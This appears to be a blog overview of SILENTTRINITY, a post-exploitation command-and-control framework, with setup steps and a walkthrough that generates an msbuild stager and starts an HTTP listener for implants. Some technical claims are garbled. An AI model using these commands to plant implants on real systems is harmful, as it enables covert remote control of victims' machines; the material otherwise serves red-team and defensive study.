![Post-exploitation Agent – SILENTTRINITY [Python, IronPython, C#/.NET]](https://cdn.cyberpunk.rs/wp-content/uploads/2018/10/silent_trinity_bg.jpg "Post-exploitation Agent – SILENTTRINITY [Python, IronPython, C#/.NET]")
Introduction: How SILENTTRINITY works?
SilentTrinity is a post-exploitation agent, powered by Python, IronPython, C#/.NET. This tool utilizes IronPython to create the C# code in Python.
IronPython is an open-source implementation of the Python programming language which is tightly integrated with the .NET Framework. IronPython can use the .NET Framework and Python libraries, and other .NET languages can use Python code just as easily.
SILENTTRINITY: Post-exploitation Agent powered by Python, IronPython, C#/.NET
Support, Limitations & Plans
.NETruntime support: The implant needs.NET 4.5+due to the IronPython DLLs being compiled against.NET 4.0.There is no ZipArchive, also.- C2 Comms: Implant only supports C2 over HTTP 1.1, because
.NET 4.5have a native WebSocket library which makes implementing a WS C2 channel possible. HTTP/2 client support for .NET’s HttpClient API is in the development process. It’ll soon be released. - COM Interop: Planning to leverage this to use IE’s COM object to do C2 ala WSC2
- Python Standard Library: We technically could load/use IronPython’s stdlib instead of calling .NET APIs but this would require writing some “magic” dependency resolving code.
- RPC: Fully fledged RPC that proxies objects between C# and Python may be implemented.
Supported Platforms:
- Linux (Ubuntu, Debian, LinuxMint, etc.), Windows, MacOSX.
Requirements:
- Server requires
Python 3.7+ - SILENTTRINITY C# implant requires
.NET 4.5+
Install/Setup
Server machine (Linux):
To install Python 3.7 on Linux (Ubuntu, Debian, and LinuxMint), first install package dependencies:
$ sudo apt-get install build-essential checkinstall
$ sudo apt-get install libreadline-gplv2-dev libncursesw5-dev libssl-dev \
libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev
Then download Python and unzip:
$ wget https://www.python.org/ftp/python/3.7.0/Python-3.7.0.tar.xz $ tar xzf Python-3.7.0.tgz $ cd Python-3.7.0
To configure and install, run:
$ sudo ./configure --enable-optimizations $ make $ sudo make install
For IronPython, visit the latest releases page and download.
Server machine (Windows & MacOSX):
To installPython 3.7 on Windows and MacOSX, you’ll need ti grab the installer.
- Windows & MacOSX – download the installer.
Client machine:
.NET 4.5– download the installer.
Usage
To see all available arguments, just type --help:
$ python3.7 stvenom.py --help usage: stvenom.py [-h] [--ip IP] [--file FILE] stager listener port positional arguments: stager Stager method listener Listener protocol port Bind Port optional arguments: -h, --help show this help message and exit --ip IP Bind IP address --file FILE Filename
Example (generating stager)
Using stvenom.py:
$ python3.7 stvenom.py msbuild http 8089 --ip $(ip -4 addr show wlp2s0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
[+] Generated stager to msbuild.xml
[*] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
[+] Generated resource file: msbuild.res
[*] Launch with 'python3.7 st.py -r msbuild.res'
Now you can launch the stager using the generated resource file:
$ python3.7 st.py -r msbuild.res
_____ ______ _______ __________________ _____ ______________ __
/ ___// _/ / / ____/ | / /_ __/_ __/ __ \/ _/ | / / _/_ __/\ \/ /
\__ \ / // / / __/ / |/ / / / / / / /_/ // // |/ // / / / \ /
___/ // // /___/ /___/ /| / / / / / / _, _// // /| // / / / / /
/____/___/_____/_____/_/ |_/ /_/ /_/ /_/ |_/___/_/ |_/___/ /_/ /_/
Codename: Ánima
Version: 0.0.1dev
ST ≫ listeners
ST (listeners) ≫ use http
ST (listeners)(http) ≫ set BindIP 192.168.1.187
ST (listeners)(http) ≫ set Port 8089
ST (listeners)(http) ≫ start
[+] Listener 'http' started successfully!
ST (listeners)(http) ≫ Running on https://192.168.1.187:8089 (CTRL + C to quit)
